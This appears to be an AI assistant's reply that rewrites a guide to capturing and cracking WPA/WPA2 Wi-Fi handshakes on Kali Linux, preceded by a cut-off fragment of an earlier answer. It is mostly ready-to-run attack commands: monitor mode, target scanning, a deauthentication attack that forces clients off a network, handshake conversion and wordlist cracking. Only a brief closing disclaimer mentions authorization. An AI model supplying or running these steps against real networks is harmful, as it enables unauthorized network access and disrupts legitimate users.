Of course. Here are the simplified, focused steps for capturing and cracking a WPA/WPA2 handshake on **Kali Linux only**. ### **Part 1: Capture the WPA/WPA2 Handshake** #### **Step 1: Prepare Your Adapter** 1. Plug in your USB Wi-Fi adapter that
You've outlined a clear and concise guide for capturing and cracking WPA/WPA2 handshakes using Kali Linux. Below is a further simplified and structured version that can be used either as a quick reference or for educational purposes.
---
# **Capturing and Cracking WPA/WPA2 Handshake on Kali Linux**
### **Part 1: Capture the WPA/WPA2 Handshake**
#### **Step 1: Prepare Your Adapter**
1. Connect a compatible USB Wi-Fi adapter that supports monitor mode.
2. Open a terminal and identify the adapter’s interface name:
```bash
iwconfig
```
#### **Step 2: Enable Monitor Mode**
Start monitor mode, which creates a new interface (e.g., `wlan0mon`):
```bash
sudo airmon-ng start wlan0
```
*(Replace `wlan0` with your actual interface name)*
#### **Step 3: Scan for Target Network**
Identify the target network, noting its **BSSID** and **channel (CH)**:
```bash
sudo airodump-ng wlan0mon
```
*(Press `Ctrl+C` to stop after locating the desired network)*
#### **Step 4: Capture the Handshake**
Start capturing the handshake from the target network:
```bash
sudo airodump-ng --bssid [TARGET_BSSID] -c [CHANNEL] -w capture wlan0mon
```
* Replace `[TARGET_BSSID]` and `[CHANNEL]` with details from Step 3.
* Wait for the message `WPA handshake: [BSSID]` to appear before stopping with `Ctrl+C`.
**Pro Tip:** If the handshake isn’t captured:
```bash
sudo aireplay-ng --deauth 5 -a [TARGET_BSSID] wlan0mon
```
### **Part 2: Crack the Handshake with Hashcat GUI**
#### **Step 5: Install Hashcat GUI**
Ensure you have the Hashcat GUI installed:
```bash
sudo apt update && sudo apt install hashcat-gui
```
#### **Step 6: Convert Capture File Format**
Transform the `.cap` file to a format suitable for Hashcat:
```bash
hcxpcapngtool -o capture.22000 capture-01.cap
```
*(Assuming your capture file is named `capture-01.cap`)*
#### **Step 7: Crack the Password**
1. Launch the Hashcat GUI from the applications menu.
2. Under **Hashfile**, select your `capture.22000` file.
3. Set **Attack Mode** to `Straight` (for wordlist use).
4. Choose a **Wordlist**. Use Kali’s built-in list:
```bash
/usr/share/wordlists/rockyou.txt
```
*(Unzip if necessary: `gunzip /usr/share/wordlists/rockyou.txt.gz`)*
5. Confirm your **Device** is set to use your GPU.
6. Click **Start** to begin cracking.
Watch for the password to appear on the screen when found.
---
### **Important Notes:**
- Performing these actions on networks without authorization is illegal. Only conduct penetration testing on networks you own or have explicit permission to test.
- This document is for educational and ethical hacking purposes only. Use responsibly.


